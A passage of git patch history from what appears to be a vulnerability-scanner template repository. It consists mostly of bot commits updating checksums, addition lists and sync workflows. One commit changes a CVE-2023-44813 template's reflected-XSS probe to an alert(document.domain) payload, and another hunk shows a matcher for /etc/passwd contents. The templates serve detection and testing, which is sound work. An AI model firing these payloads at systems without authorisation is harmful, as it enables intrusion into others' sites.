11:49:15 +0530 Subject: [PATCH 328/375] Update checkpoint-firewall-enum.yaml --- javascript/enumeration/checkpoint-firewall-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 057dee67e8..982ee2a268 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -1,7 +1,7 @@ id: checkpoint-firewall-enum info: - name: Check Point Firewall - Enum + name: Check Point Firewall - Detect author: pussycat0x severity: info reference: From ece9db27aab81fbb387db897c0a55310159943b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:20:05 +0000 Subject: [PATCH 329/375] Auto Generated New Template Addition List [Wed May 15 06:20:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 19bc997a04..d48e26f086 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml +http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml From 5ddb801fb3abcc27519602b8386ba6580deac148 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:20:20 +0000 Subject: [PATCH 330/375] Auto Generated Templates Checksum [Wed May 15 06:20:20 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 66c83d9ca8..d5069c2544 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3246,6 +3246,7 @@ http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe +http/cves/2024/CVE-2024-1561.yaml:88f4487990c9da0ee3fa98030c0a6693cd03a02b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d @@ -5385,7 +5386,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 -http/misconfiguration/installer/custom-xoops-installer.yaml:d616ad8b7ead738c10458cd6cabbf31fa18683dc +http/misconfiguration/installer/custom-xoops-installer.yaml:ee8a3bf092cb7c1efd90f278a5ad74e2f4442510 http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f @@ -8531,7 +8532,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cbad61704aa4d1d43cde2cb1311c497d8c317993 +templates-checksum.txt:41bccd8b074819b2345826bef5ec3aecd18f7a01 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ab4cbabbb9be6490998dfd1f2b689b93ec61928e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:20:54 +0000 Subject: [PATCH 331/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 15a344e683..fdac2be272 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/cves/2024/CVE-2024-1561.yaml' - 'http/cves/2024/CVE-2024-3097.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' From 78649433bb2cd3e03ea19ae87f2ecfcf2daedf11 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:21:50 +0000 Subject: [PATCH 332/375] Auto Template Signing [Wed May 15 06:21:50 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1561.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 8540dc604a..c46073a3cb 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -71,3 +71,4 @@ http: - regex('root:.*:0:0:', body) - 'contains(header, "text/plain")' condition: and +# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8fde9204f892b23dc54c1d7f2fb7d5a00aec5ed1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:22:02 +0000 Subject: [PATCH 333/375] Auto Generated New Template Addition List [Wed May 15 06:22:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d48e26f086..095c091f5d 100644 --- a/.new-additions +++ b/.new-additions @@ -31,3 +31,4 @@ http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +javascript/enumeration/checkpoint-firewall-enum.yaml From 99ff6a22c1f921a5efb5fcce846f1635b2a64d6a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:22:06 +0000 Subject: [PATCH 334/375] Auto Generated Templates Checksum [Wed May 15 06:22:06 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d5069c2544..dfe29c7d83 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8310,6 +8310,7 @@ javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f0 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 +javascript/enumeration/checkpoint-firewall-enum.yaml:0e7be7e66bef638119ebd165cdcbba627f7afa26 javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16 javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c @@ -8532,7 +8533,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:41bccd8b074819b2345826bef5ec3aecd18f7a01 +templates-checksum.txt:4e04f33105f206f3ed357d9cc0a527b85160a425 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b8b7e0aab1ac6fa52bea9310910d5e4e2d6ea299 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:22:51 +0000 Subject: [PATCH 335/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index fdac2be272..1b448e2321 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -36,6 +36,7 @@ on: - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' + - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 20c1d758372fabd27654842b36cd803df5ec8d1a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:36:51 +0000 Subject: [PATCH 336/375] Auto Generated New Template Addition List [Wed May 15 06:36:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 095c091f5d..371632d392 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cnvd/2017/CNVD-2017-06001.yaml +http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml From 8d8805b371286279b22b42bb2c888d79609f23e1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:37:01 +0000 Subject: [PATCH 337/375] Auto Generated Templates Checksum [Wed May 15 06:37:01 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dfe29c7d83..791b312a3c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3069,6 +3069,7 @@ http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22 http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae +http/cves/2023/CVE-2023-35158.yaml:736994aa875632d631f35f70562fcf31dfa39196 http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 @@ -3246,7 +3247,7 @@ http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1561.yaml:88f4487990c9da0ee3fa98030c0a6693cd03a02b +http/cves/2024/CVE-2024-1561.yaml:a134c8864733abe3278ebb6cf67a54c36b6ae29f http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d @@ -8533,7 +8534,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4e04f33105f206f3ed357d9cc0a527b85160a425 +templates-checksum.txt:c488fa8d3caa90906ab4d210b4f7e1a22a2f4bce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e117bf4d5526630add4d1065a8867fdc464f40a2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:37:31 +0000 Subject: [PATCH 338/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1b448e2321..63f48a1a6c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cnvd/2017/CNVD-2017-06001.yaml' + - 'http/cves/2023/CVE-2023-35158.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' From 9cdb270679af92ac47a1f419d0b443479f4c4c79 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:37:43 +0000 Subject: [PATCH 339/375] Auto Generated New Template Addition List [Wed May 15 06:37:43 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 371632d392..56f6d5f779 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cnvd/2017/CNVD-2017-06001.yaml +http/cves/2023/CVE-2023-29827.yaml http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml From 8327d283cd00010ff53e8e360896fd13e96ed8d8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:37:50 +0000 Subject: [PATCH 340/375] Auto Generated Templates Checksum [Wed May 15 06:37:50 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 791b312a3c..3e7d2fe8de 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3010,6 +3010,7 @@ http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 +http/cves/2023/CVE-2023-29827.yaml:d6b8d8dd39ad77d513e00403c358db3dbb4ce073 http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8 http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5 @@ -8534,7 +8535,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c488fa8d3caa90906ab4d210b4f7e1a22a2f4bce +templates-checksum.txt:405f62cfd89c4d869b51412917c95bb6ea2c0011 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c2ad6b93cd6db43deeb832bf17f1ac0fd5a69cf Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:38:24 +0000 Subject: [PATCH 341/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 63f48a1a6c..a50431838e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cnvd/2017/CNVD-2017-06001.yaml' + - 'http/cves/2023/CVE-2023-29827.yaml' - 'http/cves/2023/CVE-2023-35158.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' From 56f19549d5d2ba231b510ea827d0b04c987fb2fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:38:45 +0000 Subject: [PATCH 342/375] Auto Template Signing [Wed May 15 06:38:45 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35158.yaml | 1 + javascript/enumeration/checkpoint-firewall-enum.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 002255372b..cec2140f85 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -40,3 +40,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 982ee2a268..358c270263 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -35,3 +35,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a00483046022100ee7f1b386f2f382432b2846abb2832434819f68e200c9e7063099dead504f141022100f85c2860578d5e28ebc3fc651d9928447b42bcd28b5d510c7cf40223f8d5fd8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 75c4277fb972815e0fa9656159c9f8882dd3c81b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 12:12:04 +0530 Subject: [PATCH 343/375] minor update --- http/cves/2023/CVE-2023-44813.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 77040b15e1..88f1ab7886 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -32,14 +32,14 @@ info: http: - method: GET path: - - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;'" + - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'" matchers-condition: and matchers: - type: word part: body words: - - "initInviteFriendBtn('model');alert(1)//;" + - "initInviteFriendBtn('model');alert(document.domain)//;" - type: word part: header From b31b1a1a41e2753d5ab741fbbced9d611ab4ede2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:46:16 +0000 Subject: [PATCH 344/375] Auto Generated New Template Addition List [Wed May 15 06:46:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 56f6d5f779..3311911a44 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-29827.yaml http/cves/2023/CVE-2023-35158.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml +http/cves/2023/CVE-2023-44813.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml From eff6a7313031ce0235f44eb7009ded92d91784a5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:46:26 +0000 Subject: [PATCH 345/375] Auto Generated Templates Checksum [Wed May 15 06:46:26 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3e7d2fe8de..d1c703ef35 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3070,7 +3070,7 @@ http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22 http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae -http/cves/2023/CVE-2023-35158.yaml:736994aa875632d631f35f70562fcf31dfa39196 +http/cves/2023/CVE-2023-35158.yaml:93718c34c9acb11a626e4076fe6f21953401b5a4 http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 @@ -3166,6 +3166,7 @@ http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 +http/cves/2023/CVE-2023-44813.yaml:799d537f93a6a047dd34ac0c099fee60ec58fdab http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 @@ -8312,7 +8313,7 @@ javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f0 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 -javascript/enumeration/checkpoint-firewall-enum.yaml:0e7be7e66bef638119ebd165cdcbba627f7afa26 +javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16 javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c @@ -8535,7 +8536,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:405f62cfd89c4d869b51412917c95bb6ea2c0011 +templates-checksum.txt:fc5915d967b1a21dcfd5a6b1d76d4dd1d5a43871 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7ebbcc7ac1a502e889aa8e6a22ac18180c619c2e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 06:47:05 +0000 Subject: [PATCH 346/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a50431838e..353817cd75 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-35158.yaml' - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' + - 'http/cves/2023/CVE-2023-44813.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' From 72c6d1ba3c7ce2138c10864da6f6be1638edff87 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:47:46 +0000 Subject: [PATCH 347/375] Auto Generated cves.json [Wed May 15 06:47:46 UTC 2024] :robot: --- cves.json | 8 ++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e0e8c711e5..160b9d0298 100644 --- a/cves.json +++ b/cves.json @@ -2115,6 +2115,7 @@ {"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} {"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"} +{"ID":"CVE-2023-29827","Info":{"Name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","Severity":"critical","Description":"ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29827.yaml"} {"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"} {"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} @@ -2174,6 +2175,7 @@ {"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection 